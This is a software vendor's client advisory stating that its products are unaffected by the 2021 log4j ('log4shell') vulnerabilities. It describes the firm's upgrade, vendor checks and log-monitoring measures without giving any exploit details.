All EVP Systems software is unaffected by the recently announced “log4j” vulnerability, officially named CVE-2021-44228 and nicknamed “log4shell.” It is also not subject to CVE-2021-45046 or CVE-2021-45105, two associated vulnerabilities of log4j. EVP Office applications—EstateVal, GiftVal, CostBasis, and CapWatch—do not use the log4j library, and therefore require no mitigation. Most of our internal systems do not use log4j either, but we do have one that has been (repeatedly) upgraded to the latest release, and therefore poses no threat.
Details
On Friday, December 10, 2021, the Apache Foundation announced that log4j, a popular logging library for the Java programming language, had a critical remote code execute (RCE) bug. When programs that use versions of log4j 2.0.0 through 2.15.0 are sent a specific series of characters, the target system can be forced to run arbitrary commands. This effectively compromises the entire system. Version 2.16.0 allows for an infinite-recursion denial-of-service attack.
log4j is very popular, and used almost universally by Java programmers. Millions of systems—from banks to stock exchanges to spacecraft—rely on the library to handle the creation and maintenance of their internal logs. That such a foundational piece of shared software was compromised is extremely serious.
Mitigations
As noted, EVP Systems itself is unaffected by the “log4shell” and associated bugs. None of our EVP Office programs use log4j, nor do the vast majority of our internal systems. The one program that does use log4j is running 2.17.0, the latest release as of December 18, 202
However, EVP Systems does not exist in a vacuum, and we are in contact with all of our vendors—our cloud-hosting provider, our e-mail service, our data suppliers, among others—to ensure that their services are not compromised or affected by the bug. If we encounter any issues, we will update our clients accordingly.
We are also monitoring our logs for the specific series of characters that indicate an attempted CVE-2021-44228 / CVE-2021-45046 / CVE-2021-45105 attack. Though all such attacks will fail, we intend to block their source IP addresses to prevent any further intrusion attempts, using any other known or potential bugs.
Questions
If you have any questions about EVP Systems handling of log4shell / CVE-2021-44228 / CVE-2021-45046 / CVE-2021-45015, please contact our Compliance Department at compliance@evspys.com.
Also, please note that a history of our treatment of high-profile Internet vulnerabilities is always available on our website.
(This article was updated on December 16, 2021 to include information about CVE-2021-45046. It was also updated on December 20, 2021 to include information about CVE-2021-45105.)